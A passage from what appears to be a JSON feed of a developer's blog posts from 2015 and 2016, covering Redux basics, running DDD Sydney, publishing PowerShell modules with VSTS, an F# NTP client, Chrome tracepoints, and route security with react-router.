your own application you don’t need to use a type property, you can use whatever you want, but doing so you’re moving away from being Redux ‘as designed’.\nAs as Action is responsible for providing instructions you’re often going to have data associated with it, this might be a Promise as you do an XHR, it might be some calculated data, or whatever. This is represented by whatever else you provide on the Action object. So an example Action might be like so:\n1 2 3 4 const action = { type: "ADD_TODO", value: "Write a blog post" }; While an Action is just a plain old JavaScript object you’ll probably want a function to generate it:\n1 2 3 4 5 6 const addTodoAction = function(value) { return { type: "ADD_TODO", value }; }; This way you can use the Action again and again in your application.\nReducers Reducers do the grunt work of your data flow, they are responsible for taking the information from the action, the present state of your data, and produce a new data state. Basically a reducer looks like this:\n1 const reducer = (state, action) => state; That is a Reducer that acts as a noop. You can do whatever you want within the Reducer, the main rule is that you shouldn’t change the original state (the first argument), instead create a new state object based on the original one. Commonly you’ll do this using Object.assign or the spread operator { ...state }.\nSo we’ll update our noop example:\n1 2 3 const reducer = (state, action) => { ...state }; // or const reducer = (state, action) => Object.assign({}, state, {}); Store The Store is really the heart of our data flow, it knows about our Reducers, it’s told to dispatch Actions and owns the State. I won’t go into the implementation of a Store, that’s next up in the series, but to consume a Store it’d be something like this:\n1 2 3 const store = createStore(reducer); store.dispatch(addTodoAction("Write a blog post")); console.dir(store.getState()); The basic process is:\nCall dispatch with an Action Execute all reducers Update the State in the Store A Store has a handy method on it, getState which then exposes our state back to us.\nNow you’re probably wanting to have a single Store within your application, a single Store, or at least the less Stores you have, the less independent State objects you would have and the easier it is to observe data changes within your application and ultimately simplify data binding.\nSide note: There’s more method that are exposed by a Store, this is just the most basic implementation. Also, I didn’t want to spoil all our fun in the first post!\nConclusion We’re starting our journey into understanding how Redux works under the hood. We’ve learnt about the three core concepts, Actions which tell us what to do/get us data, Reducers which take the current state and our Action to produce a new state and then the Store which orchestrates it all.\nNext time we’ll look into how to create our own Store.\n", "id": "2016-06-06-learning-redux-with-reducks-intro" }, { "title": "DDD Sydney 2016 - What I learnt organising the conferences", "url": "https://www.aaron-powell.com/posts/2016-06-01-dddsydney-what-i-learnt-organising-the-conference/", "date": "Wed, 01 Jun 2016 00:00:00 +0000", "tags": [ "dddsydney" ], "description": "A look back at what I learnt organising DDD Sydney 2016", "content": "On Saturday 28th May we saw the return of DDD Sydney after a 4 year absence. This was also the first year that I took a lead role in organising the event, previously I’d really only done ‘on the day’ volunteering. DDD Sydney was a team effort, but I want to talk about what I personally learnt running this event for the next person silly enough to try and organise a conference!\n2 months is not a lot of timeAround the end of March this year we made the decision to go ahead and organise DDD Sydney, but we had a couple of goals:\nDidn’t want to clash with the timing of DDD Melbourne Wanted to happen before NDC Sydney The NDC crew had already reached out to us and wanted to be our platinum sponsor, and with that we wanted to help them promote DDD Sydney. This meant we had a particular set of deadlines to hit, and with that in mind we settled on the 28th May as our event date.\nThis was approximately 2 months from when we’d had our first chat about it happening, well it happening in earnest, we’d done some preliminary work but not really got to the point of picking a date.\nWell, we managed to achieve it, but it was a real scramble to get everything done, here’s some highlights from it being a really short timeline:\nWe ordered the speaker/volunteer shirts the Sunday before the event, picking them up the Friday evening after many frantic calls to the printer 3 weeks out from the event we had no money in the account and suppliers needing to be paid (I’ll talk about finances in more detail below) 2 weeks out I found out that internet banking wasn’t setup and I couldn’t log into the bank account (so we couldn’t pay suppliers) At the event I said to the rest of the committed that I was looking forward to Sunday because that meant 6 months until we need to start planning the next one, yep we’ll aim for around 6 months lead time for 2017!\nSo who’s coming?Given there’d been 4 years since the last event we didn’t really know how “popular” the brand still was. One of the drivers behind doing the event again was that I’d had a few people ask me “when’s DDD Sydney coming back?”, generally around the time DDD Melbourne is on. Cool, so we know some people are interested but just how many are there? 10? 50? 100? 500?\nWe also didn’t know what to expect in terms of session submissions. The rest of the organisers did receive a bit of a panicked email from me a week or so out from the close of the CFP saying “So we have about 10 sessions submitted and 15 slots to fill, what do we do if we don’t get enough?!”. Knowning the teams behind DDD Melbourne, Brisbane and Perth, having talked to them about submissions I know I shouldn’t have been worried as you always get a rush at the end, but still it was nail-biting for a few days. In the end we didn’t have cause for concern, we had 52 submissions from 28 speakers!\nGiven our really short timeframe it also meant that I was concerned about whether we’d sell enough tickets. This is part of why we did the early bird sale, try and get people to buy earlier and (hopefully) we could sell out. But what constitutes selling out? How many people should we plan for? Well we based our target off the other events, but ultimately came up short (ie, we didn’t sell out), but when it was 2 weeks out with less than 100 tickets there was another panicky email from myself. But as to be expected there was a rush at the end, resulting in us having a good number of people attending.\nIt’s all about the moneyConferences aren’t free to run, but I don’t think anyone expected that.An event like DDD doesn’t work without the support of our sponsors, and that involves making sure that we receive money from those who are supporting us financially.\nMost companies that sponsor work on a 30 or 60 day invoice cycle, so when you issue an invoice for them to sponsor there’s a lag in that being paid, and here’s the kicker, you’re doing a 2 month turn around, most sponsors won’t settle an invoice for at least 30 days, and you’ve probably spent a few weeks getting it all sorted? Well you’re in a sticky situation financially aren’t you!\nSponsors aren’t the only way money comes in though, there’s also ticket sales. We used EventBrite which works really nicely, except for one kicker, they don’t forward the money until after the event (a week-ish after), so regardless of how cashflow positive you are from your ticket sales you still won’t see it until after the fact. I did speak to some other event organisers on the day who were surprised we’d used EventBrite, as they’d hit this problem in the past. It’s a hard one to solve, if you cut out the middleman and take the money directly you need to do something to support refunds/cancellations too.\nAnd then there’s your outgoing expenses, things like venue hire, catering, etc, need to be paid before the event, bit of a problem if you’re not getting ticket money until after and sponsors won’t complete the invoice in time!\nNext year I want to make sure that we plan our cashflow better so we’re not scrabbling at the last minute. It’ll help that we already have a number of sponsor contacts now, we can engage a lot earlier which will help there.\nVolunteersThis is something I really didn’t think about in the lead up to the event, how many volunteers would we need for it? Well we’ve got a few of us on the organising committee and we’ll rope a few in on the day. Right?\nWell, that’s not really the right way to approach the problem, in hindsight we should have planned more around the number of people we’d have to help out, this would’ve helped direct people to the venue location and we could’ve had a dedicated volunteer per room to direct people.\nConclusionWe pulled it off. It was a lot of hard work but more importantly it was very much a learning experience.\nRunning a business is hard work, and that’s ultimately what this is, a not for profit business but a business none the less. Cashflow, supplier management, vendor management, these are all the behind the scenes tasks we take on to make a day like DDD happen.\n", "id": "2016-06-01-dddsydney-what-i-learnt-organising-the-conference" }, { "title": "Deploying PowerShell modules with VSTS Build", "url": "https://www.aaron-powell.com/posts/2016-02-08-deploying-powershell-modules-with-vsts-build/", "date": "Mon, 08 Feb 2016 00:00:00 +0000", "tags": [ "powershell", "cd", "vsts" ], "description": "Automating the publishing of PowerShell modules to the gallery with VSTS Build", "content": "A few years ago I created a PowerShell module to allow me to install and use multiple versions of Node.js on my Windows machine. I realised that this could be useful for other people so I put it up on GitHub, called ps-nvmw, short for PowerShell Node Version Manager for Windows.\nBut when I first wrote it there was no really good way to share modules with other people, my instructions were always something like “Clone the repo and import the module”.\nWith Windows 10, or more accurately Windows Management Framework 5 (which is part of Windows 10 and a separate install for other OS’s) PowerShell module sharing is even easier, thanks to PowerShell Gallery (there are other offerings but this seems to be the best approach to me). Basically this works like NuGet or Chocolatey, allows you to find, install and update modules, and is quite easy to distribute them too.\nSo I decided to get ps-nvmw up there and I decided to do it in a continuous delivery approach using Visual Studio Team Services Build and let’s walk through how to do that.\nStep 1 - Create a VSTS BuildNote - I’m using GitHub as my repository and you can to, follow this guide to set that up.\nWe’re going to create a new build in VSTS, under whatever project you want, I have one called github-projects that builds all my various GitHub projects (shocking!). Because this is pretty custom we’re going to use the Empty build definition template.\nStep 2 - Setting up the publish folderWhen your build agent checks out your repository it does so into a very short path, for example mine is C:\\a\\1\\s (my guess is to avoid problems with Windows Path’s exceeding the 260 character limit), and this is going to be a problem in Step 4 as we’ll use the Publish-Module commandlet with the -Path. The problem we’ll hit is that this command expects the name of the module definition (your psd1 file) is the same as the folder. Sadly s is not the name of my module, it’s nvm, so we will need to create a new folder.\nSo add a new Build Step of type Command Line (under Utility) with the tool being mkdir and the arguments being the name of your module:\nStep 3 - Preparing your moduleWith our module folder created we next want to put the files in that we want to publish, ideally your psm1 and psd1 files.\nTime to add another Command Line Build Step, this time it’ll be a tool of xcopy and arguments to select your files:\nStep 4 - Publishing your moduleThis step I’m doing a little dodgy, mostly because I’m lazy, but now it’s time that we publish our module to the gallery. To do that we’ll need to use the Publish-Module commandlet in PowerShell, providing the path to your module and the API key for the gallery. For the sake of good practice (I can do good practice inside dodgy work!) I’ve created a private variable in the build for the API key (keeps it out of my logs then).\nFor this step I’m again using Command Line but the tool is powershell and the arguments are Publish-Module -Path $(System.DefaultWorkingDirectory)\\nvm -NuGetApiKey $(PSGalleryApiKey). There are two variables in the arguments, the first is the folder the repository was cloned to (which is available in all build steps) and the second is my API key, which I gave the name PSGalleryApiKey. The step looks like so:\nYou can probably see how it’s a little dodgy, that I’m using a Command Line step to invoke a PowerShell session to run a PowerShell command. If you were doing it better you would have a PowerShell file that wrapped that command in your repository, since you can’t run “arbitrary” PowerShell from a step (without a dodgy thing like I have).\nConclusionThere we have it folks, 4 steps on how to use VSTS Build to deploy a PowerShell module to the PowerShell Gallery. It might be a little dodgy but I have that working with CI builds, so all pushes to master on GitHub result in a release to the gallery.\nSome final thoughts:\nI really should write a script that goes into the repository to replace the dodgyness of Step 4 I’m not using Pester for testing like a lot of people, but getting that hooked in would be cool The workflow is not quite right as I’m deploying from VSTS Build, that should really happen from VSTS Release Management. To do that you’d remove the last step I have, replace it with a ‘copy to artifacts’ step, and have RM run the Publish-Module step. It might need to redo the path setup steps too Happy Scripting!\n", "id": "2016-02-08-deploying-powershell-modules-with-vsts-build" }, { "title": "Are you ready for January 12?", "url": "https://www.aaron-powell.com/posts/2016-01-03-are-you-ready-for-january-12/", "date": "Sun, 03 Jan 2016 00:00:00 +0000", "tags": [ "internet-explorer" ], "description": "Are you ready for the end of old Internet Explorer?", "content": "On January 12 all versions of Internet Explorer prior to version 11 will reach end of life.\nAssuming you’re running Windows 8.1 or 10 this won’t be a problem as IE11 was the only version you could install. If you’re running Windows 7 you are probably already running IE11 as it was a mandatory update shipped via Windows Updates so unless you disabled automatic updates you’re also safe.\nIf you’re running any other Windows version then you’re already running software that has end of life and you should probably upgrade anyway.\nWhat version of IE am I running?If you’re unsure what version of IE you have on your machine it’s pretty easy to check:\nOpen Internet Explorer Go to Help (you may need to press ALT if it’s you can’t see the menu) Choose About Internet Explorer Why does it matter?Security, it all comes down to security. Browsers are a very common attack vector for hackers so browser makers are constantly working to ensure they protect against newly discovered issues. So with IE < 11 no longer being supported you run the risk of having another potential entry point for hackers.\nAs a web developer I have another reason for why this matters, interoperability. The IE team spent a lot of time in IE11 to improve interoperability including adding a bunch of webkit vendor prefixes. While I don’t agree with having to add webkit prefixes around the shop, having the web just work across all browsers is something I can get behind.\nMy company has an app requiring IE While the argument of “well, just upgrade it” might be the preferred option it’s not always the simplest option, and if that’s the case then you should check out Enterprise Mode for IE11. This gives your users the power of IE11 for the general web, but allows you to invoke a legacy mode for your internal applications.\nConclusionIt’s time to upgrade!\n", "id": "2016-01-03-are-you-ready-for-january-12" }, { "title": "2015 - A year in review", "url": "https://www.aaron-powell.com/posts/2016-01-01-2015-a-year-in-review/", "date": "Fri, 01 Jan 2016 00:00:00 +0000", "tags": [ "year-review" ], "description": "A look back at the year that was.", "content": "And just like that another year has come to a close. To me it’s felt like I’ve been really quite quiet compared to past years but a quick count shows that I published 17 posts on here, which is just as many as I did in 2014.\nMicrosoft released a new browser, codenamed Project Spartan and later renamed Microsoft Edge. This was pretty huge (I think) for web developers and I speculated on what it would mean. Having now been using Edge as my primary browser since it first came into the Windows 10 previews I must say I am a happy web user. For my day-to-day activities Edge just works, the way any browser should, I don’t recall the last time I had a rendering issue, or platform issue (other than 1Password Teams which they have a bunch of broken accounts that have invalid keys, of which I have one). My biggest gripe is the lack of plugins, I don’t have access to my password manager which plain sucks. I’m sure something is in the works (c’mon, it’s gotta be!) but until then it’s going to be a hassle that I can live with.\nAs a web developer there are 2 things that annoy me, that I can’t side-dock (easily) and lack of plugins (which makes working with frameworks much easier). I really want side docking because I have more horizontal space than vertical so I want to leverage that with my tools off to the side. Now sure, you can use snap to achieve this, but it’s not an integrated resize so it’s a 2nd class citizen. I also talked about one of my favourite features in F12 and how to simulate tracepoints in Chrome’s dev tools. It you’re not using tracepoints (or a simulated attempt) I recommend getting in on the action.\nIn among the excitement of a new browser coming out there was the expected trolls who seem to think that there should be a single browser and that it should be Chrome. So I took to my keyboard to do a writeup about the dangers of a browser monoculture.\nBut it wasn’t all browsers, I dived back into F# this year, speaking at the F# Sydney user group on writing a type provider (which I would like to explore further with Umbraco for strongly typed without the mess of writing classes, but that’s a problem for another day). I then joined in the F# Advent Calendar and wrote about how to know what time it is using F# and ntp.\nI also continued my work with Pluralsight, this year I turned my attention to getting their Umbraco content up and running, first publishing Umbraco Jumpstart which aims to give an overview to people new to Umbraco, then followed it up with Using ASP.NET MVC with Umbraco to look at the development experience. In 2016 I’ll be looking to add more courses to the library on Umbraco and am always open to suggestions on what you’d like to see (I have some ideas but I’d prefer to be driven by the community).\nThe one thing that was really difference this year, which is why I think it’s felt like a quiet year for me, is I did much less speaking than in previous years, in fact this was the first year my wife and I didn’t go overseas to a conference. I missed my first DDD Melbourne ever (and the other DDD’s) but that was because they scheduled it on the same day as my wife was due with our first child, which I figured I should hang around in Sydney for. My hope is to make it back this year and we’re also looking to start-up DDD Sydney again, we’ve spoken to a venue that we like but there’s a bunch of background work before we can lock it in. Keep your eyes open for announcements.\nAnd finally I hit my 5 years at Readify and also received a promotion to Lead Consultant. This has given me the opportunity to spend more time focusing on the business side of consulting, undertaking workshops, and working with my fellow consultants in their careers. Shameless plug, we’re looking for people to join us, so if you’ve wanted to get into consulting drop us a line or email me directly (my email isn’t hard to find ;)), we’ll even help you relocated to Australia if you’re not already here.\nWell, that’s a wrap.\n", "id": "2016-01-01-2015-a-year-in-review" }, { "title": "What's the time Mr Wolf?", "url": "https://www.aaron-powell.com/posts/2015-12-07-whats-the-time-mr-wolf/", "date": "Mon, 07 Dec 2015 00:00:00 +0000", "tags": [ "fsharp", "FsAdvent" ], "description": "Telling the time with F# and ntp.", "content": " Tis the season, and to get into the festive spirit I’m contributing to the 2015 F# Advent calendar.\nRecently I was working with a client who had a need to do some business processes on at certain times. So how do you know what the time is? We crack out System.DateTimeOffset don’t we!\nWell it turn out that there is a flaw when it comes to using that in the form of clock drift, that think when your microwave and phone ar no longer showing the same time, even though you are sure you set it to the same time the other day!\nOn Windows you can dive into your date time settings and there’s an option to sync with a time-server. By default this is time.windows.com and I’ve seen that dialog plenty over my IT career but had never really paid much attention to how my computer knows it’s 11.59pm 24th December, have you? So your computer will sync to this place, it’ll sync periodically (you have some control over it, but not a lot), and this posed a problem for my client, clock drift could have a problem for them.\nWell, what time IS it? If we’re establishing our problem we need to know what time it is, very accurately. Well there’s a particular kind of clock which are highly specific, the atomic clock. Since these things are kind of big you can’t really put it on your desk so let’s think of the next thing, how does Windows know what time it is? Well this happens using an atomic clock (or similar precision device like a GPS) and done via the Network Time Protocol (ntp). You connect to a ntp server which then connects to a has synched up server until you hit an atomic clock, or a stratum 0 time instrument.\nWell ntp is pretty simple a protocol, you use a UDP socket and get a byte array, 48 characters in length, which has all the important information.\nSo let’s implement a ntp client in F#.\nTalking to the server The first thing we’re going to need to do is to connect our ntp server. I’m going to keep using time.windows.com as my sample, but there’s plenty of different time servers, of varying stratum levels (time.windows.com is stratum 4, which means there are 4 off the source).\nI’m going to resolve the IP of my server first, let’s create a getEndPoint function:\nlet getEndPoint (server : string) = Next I’m going to use System.Net.Dns to get the IP address:\nlet getEndPoint (server : string) = let address = Dns.GetHostEntryAsync(server) But this is an async method (and C# async) so we’ll do some pipelining:\nlet getEndPoint (server : string) = let address = Dns.GetHostEntryAsync(server) |> Async.AwaitTask |> Async.RunSynchronously This returns an IPHostEntry which then I can use to get the IPs for the host and I’ll take the first IP from that:\nlet getEndPoint (server : string) = let address = Dns.GetHostEntryAsync(server) |> Async.AwaitTask |> Async.RunSynchronously |> fun entry -> entry.AddressList |> fun list -> list.[0] Finally I’ll create the endpoint connection using port 123 which is the standard ntp port:\nlet getEndPoint (server : string) = let address = Dns.GetHostEntryAsync(server) |> Async.AwaitTask |> Async.RunSynchronously |> fun entry -> entry.AddressList |> fun list -> list.[0] new IPEndPoint(address, 123) Now we’re ready to connect our ntp server via a UDP socket:\nlet getTime (ipEndpoint : IPEndPoint) = let ntpData = [| for i in 0..47 -> match i with | 0 -> byte 0x1B | _ -> byte 0 |] let socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp) socket.Connect(ipEndpoint) socket.ReceiveTimeout <- 3000 socket.Send(ntpData) |> ignore socket.Receive(ntpData) |> ignore socket.Close() ntpData F# makes generating the data packet array really easy and using a match means that we can set the various bytes as they need to be set (for example I’m initialising a version in the first byte). I should be setting the Originate Timestamp at bytes 32 - 39 which you could also do in the match but I’m a bit lazy (note: not doing this means it’s harder to work out the time based on latency).\nExtracting our data Now I have a byte array that is full of useful information that has been returned from our ntp server, but it’s in raw bytes and they aren’t overly readable so we probably want to split that apart. I’m going to create a record type to represent it:\ntype NtpResponse = { Stratum : int ReferenceTime : DateTime OriginateTime : DateTime ReceiveTime : DateTime TransmitTime : DateTime } Then we’ll make a function to break apart our byte array\nlet extractor (ntpData : byte[]) = { Stratum = int ntpData.[1] ReferenceTime = DateTime.Now OriginateTime = DateTime.Now ReceiveTime = DateTime.Now TransmitTime = DateTime.Now } The first bit that I’m extracting is the stratum, which tells us what level the server is. This information is useful if you’re wanting to know how close a server is to the time source, as the further away from the time source the more network hops have occurred. We’re also casting the value from a byte to an int, which in F# we need to be more explicit about than if we were doing it in C#\nBut the more important part of the data that we have is the date/time components, which are 8 bytes starting at 16, 24, 32 and 40 respectively, so let’s look at how we can get them out of the array.\nThe 8 bytes that make up the timestamp are comprised of a 64 bit fixed point timestamp which we need break into the 32 bit integer value representing the seconds since Unix Epoch and 32 bit floating point value that is the precision of the timestamp.\nTo do this I’m going to create a function that takes the 8 bytes and gets me a timestamp:\nlet extractTime ntpData position = let intPart = BitConverter.ToUInt32(ntpData, int position) let fracPart = BitConverter.ToUInt32(ntpData, int position + 4) We’re using uint32 to represent the data that we’re pulling out (since it could be a large number). But the next this we need to deal with is that the value is Big Endianness notation so it needs to be swapped for us to use. Well that function isn’t too hard to write…\nlet swapEndianness (x : uint64) = (((x &&& uint64 0x000000ff) <<< 24) + ((x &&& uint64 0x0000ff00) <<< 8) + ((x &&& uint64 0x00ff0000) >>> 8) + ((x &&& uint64 0xff000000) >>> 24)) Now we can update our extractTime method with this to generate the miliseconds and create our DateTime object:\nlet extractTime ntpData position = let intPart = BitConverter.ToUInt32(ntpData, int position) let fracPart = BitConverter.ToUInt32(ntpData, int position + 4) let ms = ((swapEndianness (uint64 intPart)) * uint64 1000) + ((swapEndianness (uint64 fracPart)) * uint64 1000) / uint64 0x100000000L (new DateTime(1900, 1, 1, 0, 0, 0, DateTimeKind.Utc)).AddMilliseconds(float ms) It’s times like this I really miss the operator overloading of C#…\nWith our extractTime method working let’s go back to completing the extractor:\nlet extractor extractTime (ntpData : byte[]) = let extractor' = extractTime ntpData let referenceTime = extractor' 16 let originateTime = extractor' 24 let receiveTime = extractor' 32 let transmitTime = extractor' 40 { Stratum = int ntpData.[1] ReferenceTime = referenceTime OriginateTime = originateTime ReceiveTime = receiveTime TransmitTime = transmitTime } And with a bit of partial application we can bind the extractTime method to the ntpData so that it is simpler to invoke.\nFinishing it all up With all our functions written we can now work out what the time is:\nlet time = getEndPoint "time.windows.com" |> getTime |> extractor extractTime printfn "The time is %s" (time.TransmitTime.ToString("dd/MM/yyyy hh:mm:ss.fffffff")) And we’re done. Well mostly, I’ve left a few exercises to you dear reader if you’d like to finish this off:\nSet the Originate Time in the data you send to the ntp server Use the time the request was sent from the client with the time on the server to determine the real time without latency (using the clock synchronisation algorithm) Extract the other parts from the response packet, like version, poll interval (so you know how often you can hit the server), etc Conclusion Time is all relative but with ntp we can work out just how relative it is. With a little bit of F# we can query a ntp server and get the time information back. Hopefully this has been a bit of fun looking at how one of the protocols we take for granted works.\n", "id": "2015-12-07-whats-the-time-mr-wolf" }, { "title": "Simulating tracepoints in Chrome dev tools", "url": "https://www.aaron-powell.com/posts/2015-08-30-simulating-tracepoints-in-chrome-dev-tools/", "date": "Sun, 30 Aug 2015 00:00:00 +0000", "tags": [ "web-dev", "javascript", "f12", "chrome", "debugging" ], "description": "One of my favorite F12 under appreciated tooling features is tracepoints and I want to look at how to simulate it in Chrome's dev tools.", "content": "There’s a very under rated feature in MS Edge’s F12 tools called tracepoints. A tracepoint is like a breakpoint but it calls console.log with the statement you provide it. This is really useful want to inspect some state as your application runs but don’t want to interupt the application flow by adding a breakpoint, or can’t modify your code and inject console.log statements (eg: production environments).\nWell it turns out that we can easily simulate this in the Chrome dev tools (and I suspect Firefox too, but I don’t spend much time debugging in Firefox), and that’s by exploiting the conditional breakpoints\nWith a conditional breakpoint it runs what you give it and if it’s true you’ll have the application break, if it returns false it’ll continue on unabided. If we exploit type coersion in JavaScript we can call console.log as our conditional breakpoint statement and not return anything since console.log returns undefined which is coerced to false.\nAnother thing we can do is use the JavaScript comma operator which allows us to chain statements together, which each executed and the final of the chain being the returned value. If we combine this with the type coersion we can execute multiple console.log statements we can achieve something like this:\nNifty little trick, especially when debugging envuronments we can’t access.\n", "id": "2015-08-30-simulating-tracepoints-in-chrome-dev-tools" }, { "title": "Error with MS Edge F12 tools on Windows 10 10158", "url": "https://www.aaron-powell.com/posts/2015-06-30-f12-error-in-windows-10-10158/", "date": "Tue, 30 Jun 2015 00:00:00 +0000", "tags": [ "ms-edge" ], "description": "A fix for a small problem in MS Edge F12 tools on Windows 10 build 10158.", "content": "Today I upgraded to the latest Windows 10 Fast Ring insiders build, 10158. As with all previous builds this includes some updates to the new Microsoft browser, Edge (which is now officially ships as inside Windows, woo!).\nWhile trying to solve a problem on the site I’m working on I opened up F12 and went to use the profiler, only to be met with this error:\nI had a quick chat with some of my contacts over on the F12 team to see if it was a known bug or something to be reported, and they suggested that I restart the Internet Explorer ETW Collector Service, which you’ll find in your list of Windows Services. For me this service was not running, starting it up and a restart of Edge and the problem went away.\nHopefully this helps someone else out there.\n", "id": "2015-06-30-f12-error-in-windows-10-10158" }, { "title": "Learn how to get started with Umbraco on Pluralsight", "url": "https://www.aaron-powell.com/posts/2015-06-15-umbraco-jumpstart-on-pluralsight/", "date": "Mon, 15 Jun 2015 00:00:00 +0000", "tags": [ "umbraco", "pluralsight" ], "description": "My new Pluralsight course, Umbraco Jumpstart is out!", "content": "TL;DR My latest Pluralsight course, Umbraco Jumpstart is up.\nOver the last few months I’ve been working on a new Pluralsight course, Umbraco Jumpstart, today it finally got published and I couldn’t be happier.\nThis is very much a beginner course, my aim was to help people who have either never seen Umbraco before or haven’t had a chance to play with it yet take their first steps into Umbraco. Basically I want to ge a whole new generation of people working with Umbraco. That does mean that if you’re already using Umbraco it might be a little bit too basic for you, but now is where you can chime in.\nWith this course out I want to look at what comes next, what topics do you want to see covered on Pluralsight in the Umbraco space as I really want to start getting the library built up. So my fellow Umbracians, what would you like me to start covering?\n", "id": "2015-06-15-umbraco-jumpstart-on-pluralsight" }, { "title": "Sometimes you just want a hamburger", "url": "https://www.aaron-powell.com/posts/2015-06-11-sometimes-you-just-want-a-hamburger/", "date": "Thu, 11 Jun 2015 00:00:00 +0000", "tags": [ "web-dev" ], "description": "A tongue in cheek look at JavaScript framework analogies.", "content": "My friend Chris Love wrote an article stating that Large JavaScript Frameworks are like Fast Food Resturants and a related article Why Micro JavaScript Should Be Used In Your Next Application. I want to write a bit of a rebuttal to these posts but it’ll be in my typical serious manner :P.\n300g of beef mince with a good fat content\n1 egg\nBreadcrumbs\nSalt\nPepper\nWorcestershire\nMustard\nGarlic\nOregano\nLettuce\n1 tomato\n2 eggs\nBacon\n2 pickles\nTomato sauce (not ketchup)\nMustard\nBeetroot\nCheese\n2 burger bun\nIn case you haven’t worked out we’re making a hamburger (well, 2 actually, a 300g patty would be a little excessive!) and here are my base ingredients. Now I have to construct my burger, go through the process of combining ingredients, cooking the patty, constructing the burger, making sure there is just the right amount of beetroot (we’re making a proper Aussie burger after all) and eventually consuming it.\nNow if I ever want to reproduce it I have to make sure that it’s written down somewhere, a recipe or ‘documentation’ if you will. What if I want to share the load and have someone do some of the work with me? I better make sure that I have the process written down too. Say I walk away from the cooking part way through, I want to make sure someone can easily pick up from where I left off without having to scrap everything they’ve previously learnt or worse, throw out my attempt because it’s too complex to follow.\nRight about now you might be asking yourself “Why am I reading a post about making hamburgers?” and it’s probably because I’m doing a poor job of drawing a parallel between cooking and JavaScript frameworks.\nFast doesn’t mean unhealthy One of the main points in Chris’s argument is that we need to avoid obesity and that large JavaScript frameworks are a root cause of this within web applications. While it is true that frameworks like Ember, Backbone, Angular and React (or wait, is React not a framework? I confused…) are large may do more than you need from your application it doesn’t mean that they are inherently unhealthy for your application. Instead what they tend to do is give are options and solve problems that people smarter than me have already solved.\nLet’s take for example the $http service in AngularJS. I’ve blogged before about the basics of AJAx and on the surface it’s pretty simple, but it very quickly becomes complex. Take a look at what’s needed to POST form data, you have to construct the FormData object, set it’s values, set the appropriate HTTP headers, etc. Then there’s the response side, are you going to use promises or callbacks? How about content negotiation, parsing the response to the right type, etc.\nNot so simple now is it?\nI have all the raw ingredients Over the last few years browsers have become more and more powerful with more and more features available natively, from querySelectorAll to give us CSS querying from JavaScript, WebGL if we want to do 3D, Web Audio for sound, Canvas for drawing, IndexedDB for complex data stores and that’s on top of the standardisation of features like events, element manipulation, etc.\nTo go back to our hamburger analogy I could go out and get myself some chuck, grab my mincer (yes I do own a mincer) and create my own mince to start my patty. I have all the building blocks I need but really, am I going to mince my own meat ever time, probably not.\nNow don’t get me wrong, I’m a long-time advocate of Vanilla.js. I strongly believe that you should learn the fundamentals but that doesn’t mean they are your only tool, the frameworks people build on top of these fundamentals are powerful and can save you a lot of development effort. jQuery is a great example of this, yes the DOM in today’s browsers gives us the power to do everything you want from jQuery but there’s things it does that simplify this for us. Take the even bubbling and filtering, jQuery makes it very easy to provide an event handler at a common root but filter on the source of said event. It’s a thin wrapper over DOM events but it’s highly convenient.\nI’ll make it my own way To address the points in Chris’s 2nd article, we should use micro frameworks where possible, single purpose libraries that do one thing and one thing well. I’ll go out and grind my mince, add my spices and then it’s the patty I’m after. I’ll get my sauces and mix them up to the desired tomato-to-mustard ratio.\nBut now here’s the problem, I have a one-of-a-kind burger that to know how it came together, how to recreate it, how to disassemble it, find what’s missing and reassemble it, is making the enjoyment of my burger harder.\nAnd this is where micro frameworks start to fall apart. You’re building a SPA so you go and grab an AJAX library, a thin DOM library, some custom eventing (or pubsub) to make you application disconnected, add DI, templating, security, data state management, promises and so on. Congratulations you’ve created something that doesn’t have a massive framework behind it, or does it? Have you traded AngularJS for your own equally as bloated combination of micro frameworks?\nThen once you’ve completed your non framework application you have another problem, maintenance. This unique collection of micros only exists in its current configuration in a single application, yours. How do you find solutions to your problems? We no longer have the communities to contact, it’s up to us to work out how to fix it ourselves (which isn’t necessarily a bad thing, but knowledge sharing is powerful).\nThen what happens if you, or one of your team members, leave this project? Now the number of people who understand this application design has decreased. As a consultant this is a very real problem that I face when my role wraps up and I walk out with knowledge. There’s only one real solution to this, documentation and while this knowledge drain can happen on any project the more custom a solution the more you need to document and we all know how well developers document projects. Is that few kb you’re saving just being replaced by dozens of pages of documentation and levels of complexity? What if you need to hire someone new? Is someone with Ember skills easier to find than ‘generic JavaScript’ and giving them a pile of documentation to learn your non framework?\nConclusion I like to cook (or at least I like the idea of cooking, the actuality might not really be what people want :P) but I also like my fried chicken.\nWhile it might be nice to sit back and say that we should avoid these large JavaScript frameworks because they bring bloat to our applications we need to also should avoid the other extreme, thinking that completely custom non framework applications are superior. You might be trading one kind of bloat for another. An application is more than what you wrote today, it’s the code you haven’t written, the bugs you haven’t found, the documentation you haven’t done.\nKnow how your food is made, what goes into your frameworks and how you can leverage years of chefs and cooks just like we leverage the development community.\nAn application built on a paleo diet is just as unhealthy as one built on fast food.\nPS: Don’t just eat fast food, that would be stupid.\n", "id": "2015-06-11-sometimes-you-just-want-a-hamburger" }, { "title": "Implementing security in React with react-router", "url": "https://www.aaron-powell.com/posts/2015-06-08-implementing-security-in-react-with-react-router/", "date": "Mon, 08 Jun 2015 00:00:00 +0000", "tags": [ "react", "react-router", "security" ], "description": "A look at how to page-based security with React and react-router.", "content": "In the past I’ve talked about how to do simple security with React but the focus has been on how can you conditionally include pieces on a page depending on what the user is allowed to do. Today I want to take this a step further and look at how you would do page-to-page security in a SPA using React. For this I’m going to be using the excellent react-router navigation framework.\nAlso like my last post I’m going to take a bit of a liberty on how you do security, that’s beyond the scope, let’s assume you can determine if a user is logged in or not and what their roles are. I’m also assuming you are familiar with react-router a bit already.\nAuthenticated routes The first thing I want to do is setup routes that you much be logged in for, this could be acting as a public/subscriber system. To do that we’re going to take advantage of the pipeline that react-router gives us when navigating to a page (or transitioning as their documentation refers to it). The way this works is it looks for a particular static method on the React component that you will be navigating to and we can add some logic to potentially cancel that navigation request. I’m going to create a component called AuthenticatedRoute:\n'use strict'; import React from 'react'; import userService from './services/userService'; class AuthenticatedRoute extends React.Component { static willTransitionTo(transition) { if (!userService.authenticated) { transition.redirect('login', {}, { 'nextPath': transition.path }); } } constructor(props) { super(props); } } export default AuthenticatedRoute; I’ve done this using the ES2015 support for React and ES2015 class syntax plus ES2015 import syntax for loading dependencies.\nThe most important method in this component that I’ve got is the willTransitionTo method, this is what react-router looks for to run before the navigation has been completed. The first argument to this method is the transition object which is used to control the navigation event that is happening. transition has three methods on it, abort, cancel and redirect. The one that we want to use here is the redirect method to navigate to the login page when the user is 